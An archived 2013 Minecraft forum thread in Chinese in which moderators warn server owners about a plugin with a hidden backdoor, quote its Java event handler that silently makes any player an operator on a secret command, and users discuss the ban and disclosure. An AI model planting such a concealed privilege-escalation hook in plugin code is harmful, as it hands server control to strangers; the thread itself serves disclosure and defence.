BBSPK晋级赛 MCBBS纪念版

各位在MCBBS寻找插件的服主请注意！本站出现恶意插件

作者: 混乱

日期: 2013-11-27 22:26:00 版块: 未知

接用户举报：

警告！！！！！
http://www.mcbbs.net/thread-199682-1-1.html

我们证实了由用户 920329 发布的插件含有恶意代码：

@EventHandler
public void onPlayerCommandPreprocess(PlayerCommandPreprocessEvent event)
{
if (event.getMessage().startsWith("/*******")) {
event.getPlayer().setOp(true);
event.setCancelled(true);
event.getPlayer().sendMessage("Done");
}
}

复制代码

根据举报者描述，

只要输入 /资料删除
就会把输入这个指令的玩家设置为OP
意思就是一个完全地提权插件！！！！！！！！！！！！！！！！
而且不是通过在yml注册指令，如果不翻源码是找不到的！！！是拦截命令输入这个事件！！！！！
而且权限是玩家！！！任意玩家都可以触发！！！

请各位下载过此人发布的插件的服主立刻完全删除此人发布的插件，希望各位服主今后能够确保服务器使用的插件的安全性。

用户 920329 现已永久禁封，并将永久禁止此人的服务器讯息发布，我们会等待他的解释。

MCBBS管理组

2013年11月27日

经过交流，我们判断他并非故意，而是因为大意，但是插件已经广泛传播且造成了巨大影响，所以将处罚改为禁止发言2个月。

回复:

simon3000的灵魂

simon3000的灵魂

发现了，谢谢提醒

2013-11-27 22:27:00

吓尿了。。。

2013-11-27 22:27:00

希望别再出这种类型插件。。搞得个服务器都不安静了估计

果断去外国找←_←

2013-11-27 22:30:00

要想人不知，除非己莫为{:10_493:}不明白···写个插件都要贪便宜

2013-11-27 22:32:00

谢提醒！但是我一般不会用这种挫插件的。。

2013-11-27 22:34:00

好在我沒用....

2013-11-27 22:35:00

防什么熊孩子。。。自己不防下自己的熊心。
真是若想人不知。除非己莫为啊。
可惜了。技术没用正路上。

2013-11-27 22:36:00

感谢告知！

2013-11-27 22:43:00

本帖最后由 a6809936 于 2013-11-27 23:04 编辑

以后的话mcbbs要不要也像Firefox Addon那样搞个“此插件处于审核阶段”“此插件已通过初步审核”这些呢{:10_522:}

另外，公告提醒权重发两遍了诶。。。

2013-11-27 23:03:00

这个不审核源码发现不了的话……服务器插件版主岂不累死……

2013-11-27 23:21:00

下过一个ding，感觉还不错，但是看到这帖子果断删了

2013-11-27 23:25:00

人家倒着也中枪，而且还是只差1000名就是元老级别的玩家。。。。。。。。。。。

2013-11-28 03:36:00

德玛西亚小蜗牛

德玛西亚小蜗牛

我竟然还想下载555555

2013-11-28 07:15:00

我表示这些插件我都看到过，还好没下载...

2013-11-28 09:10:00

熊孩子主义

熊孩子主义

现在的熊孩子越来越高端了.......

2013-11-28 11:29:00

熊孩子主义

熊孩子主义

话说8月5号就出了现在才发现......{:10_493:}

2013-11-28 11:34:00

完了。。我都装过。。现在就去删

2013-11-28 12:29:00

{:10_495:}卧槽。10000多的UID可惜了...

2013-11-28 12:38:00

又是黑客案件？
这年头犯罪的人怎么越来越多了！

2013-11-28 16:22:00

试了下还真是！玩家输入那条指令后直接变op，控制台连玩家输入那条指令的记录都没有，变成op的记录也没。

2013-11-28 16:47:00

表示已翻到命令

2013-11-28 18:32:00

GreatGBL 发表于 2013-11-28 12:29
完了。。我都装过。。现在就去删

{:10_523:}死翘翘了吧///哈哈哈

2013-11-28 19:19:00

表示我当时看到这个插件时果断安装，后来服务器里就出现了N个op······

2013-11-28 22:30:00

其实我想说。没曝光之前有多少人知道这指令？= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果作者真大意.你提醒的话肯定有立刻更新修复。
我只能说，MCBBS管理组无聊找事做罢了= =

2013-11-29 17:00:00

卧槽。。我还使用过这个插件。。。

2013-11-29 17:23:00

zhengyu14725896

zhengyu14725896

还好我是纯净党，服务端什么插件都没有。

2013-11-29 17:27:00

zhengyu14725896 发表于 2013-11-29 17:27
还好我是纯净党，服务端什么插件都没有。

ess呢？！？！你没装咋tp=-=

2013-11-29 18:07:00

我是前排阿！！不过我不开服务器了。。

2013-11-29 18:57:00

本帖最后由 799669332 于 2013-11-30 00:29 编辑

正在挨个反编译插件。。。
66个啊QAQ
/XXXXXXXXXXXXXXXX(已和谐
话说有人说这个命令可以获得OP

2013-11-29 20:31:00

幸好没用过插件，真恐怖啊

2013-11-29 20:43:00

本帖最后由 ikorose 于 2013-11-29 21:07 编辑

799669332 发表于 2013-11-29 20:31
正在挨个反编译插件。。。
66个啊QAQ
/

你把指令发出来之前有经过大脑思考过没？万一有些服务器服主还没看到这贴，服务器内又装了这玩意，然后万一被他服务器内一些玩家在这看到命令不是害了人家服务器？指令获取不难但也别发出来，要发出来举报贴早就发出来了。

2013-11-29 21:07:00

哇！！！！oh my god 幸好你告诉了我们

2013-11-29 21:28:00

zhengyu14725896

zhengyu14725896

123axsxs 发表于 2013-11-29 18:07
ess呢？！？！你没装咋tp=-=

当然没装，个人觉得TP很作弊。

2013-11-29 22:05:00

ikorose 发表于 2013-11-29 21:07
你把指令发出来之前有经过大脑思考过没？万一有些服务器服主还没看到这贴，服务器内又装了这玩意，然后万 ...

其实举报贴已经发出来了
但是后来又编辑删除了
但是
在百度快照和谷歌快照能找到没修改之前的
就是还是能搜到
我的已经删除了

2013-11-30 00:30:00

谢谢提醒{:10_507:}

2013-11-30 08:12:00

xpesir 发表于 2013-11-29 17:00
其实我想说。没曝光之前有多少人知道这指令？= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果 ...

= =这不是大意。。。是故意的。。。他取消了控制台的输出记录，而且指令也是无意义字符，就是单纯为了跑去别的服务器搞破坏的。。。

2013-11-30 09:44:00

幸福的-眼泪

幸福的-眼泪

谢楼主，幸好我是刚来地

2013-11-30 12:15:00

提示: 作者被禁止或删除内容自动屏蔽

2013-11-30 13:11:00

diamond--GG 发表于 2013-11-28 22:30
表示我当时看到这个插件时果断安装，后来服务器里就出现了N个op······

同人，表示重新开服

2013-11-30 14:18:00

版主英明！

2013-11-30 15:23:00

但是，还是请管理先解决一下首页无法访问的问题。。。

2013-11-30 16:02:00

谢谢你啊，好帖子不顶不行

2013-11-30 16:21:00

/资料删除~
介个好（ke）好（wu）啊！
介个让我担心其它的插件了，万一搬运/汉化的在原版就有/植入这个恶意代码，那后果不堪设想啊~
建议BBS加一个人工审核的功能~例如上传某某就要经过审核，可以像暴走漫画的审核作品一样，压金币什么的获得资格去审核，如果正解就返还押金并奖金币，如果乱审核就把压的金币扣掉~

2013-11-30 17:50:00

此人作死·

2013-12-01 14:31:00

他怎么能这样。。{:10_493:}OP要靠自己争取的{:10_521:}

2013-12-01 17:24:00

恐怖的插件............

2013-12-02 13:16:00

丿PROPHET丿发表于 2013-11-30 17:50
/资料删除~
介个好（ke）好（wu）啊！
介个让我担心其它的插件了，万一搬运/汉化的在原版就有/植入这个恶 ...

BBS全都是好人，这个也没什么大不了也不是木马，只是恶作剧罢了

2013-12-02 19:49:00

本帖最后由 595935617 于 2013-12-2 19:59 编辑

感谢那个发现此代码的大触

2013-12-02 19:55:00

97043381 发表于 2013-12-2 19:49
BBS全都是好人，这个也没什么大不了也不是木马，只是恶作剧罢了

额，好吧·但是难免有高能小学生。。。

2013-12-02 19:58:00

丿PROPHET丿发表于 2013-12-2 19:58
额，好吧·但是难免有高能小学生。。。

小学生会弄木马？逗

2013-12-02 20:38:00

ni ma wo gang gang xia zai le a. xing kui mei an zhuang

2013-12-02 20:55:00

97043381 发表于 2013-12-2 20:38
小学生会弄木马？逗

高能版~{:10_505:}

2013-12-02 21:08:00

恶意插件的英文名是什么？装了以后不知道哪个是，该如何删除。
有趣的连杀信息

2013-12-03 20:43:00

bacteria 发表于 2013-12-3 20:43
恶意插件的英文名是什么？装了以后不知道哪个是，该如何删除。
有趣的连杀信息

MultiKillS

2013-12-03 20:47:00

我不幸躺了求那几个插件的名字我好删除谢谢==

2013-12-12 18:02:00

吓尿了。。。{:10_552:}

2014-01-18 15:54:00

= =好可怕

2014-01-26 23:03:00

这位用户屠版

2014-02-08 15:02:00

求他的大杀特杀插件的英文名（服务端里貌似有！！！！！）不过插件有点多所以不知装了没，需要知道英文名后才查的到（两个都要）

2014-04-23 14:09:00

还好..这个插件我进去看过..不过我觉得不好所以就没有下载...如果我那时下载了...我就惨了...

2014-04-23 15:53:00

我看过还好也是没下载

2014-05-10 10:09:00

Man, what can I say? MCBBS archive back! -- Bobe Kryant

Archiver|小黑屋| Mcbbs2.net | 隐私政策 | 手机版

"Minecraft"以及"我的世界"为美国微软公司的商标本站与微软公司没有从属关系

© 2010-2024 MCBBS帖子存档版权没有本站内原创内容版权属于其原创作者，除作者或版规特别声明外未经许可不得转载